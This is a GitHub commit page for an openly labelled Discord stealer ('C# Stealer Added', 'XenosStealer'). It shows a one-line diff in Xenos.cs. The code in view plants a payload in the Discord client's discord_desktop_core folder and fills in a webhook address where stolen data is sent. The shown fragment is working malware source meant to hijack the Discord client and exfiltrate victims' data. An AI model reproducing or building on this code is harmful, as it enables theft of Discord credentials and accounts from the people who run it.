Skip to content

Commit

Permalink
🐺 C# Stealer Added
Browse files Browse the repository at this point in the history
🐺 C# Stealer Added
  • Loading branch information
KanekiWeb authored Apr 21, 2022
1 parent c492201 commit a9a7592
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Grabber/Csharp/Xenos.cs
Original file line number Diff line number Diff line change
Expand Up @@ -127,7 +127,7 @@ public static void __InjectPayload()
try
{
Directory.CreateDirectory(core + @"\discord_desktop_core\XenosStealer");
File.WriteAllText(file, Payload);
File.WriteAllText(file, Payload.Replace("%WEBHOOK_LINK%", Host));
}
catch { };
});
Expand Down

0 comments on commit a9a7592

Please sign in to comment.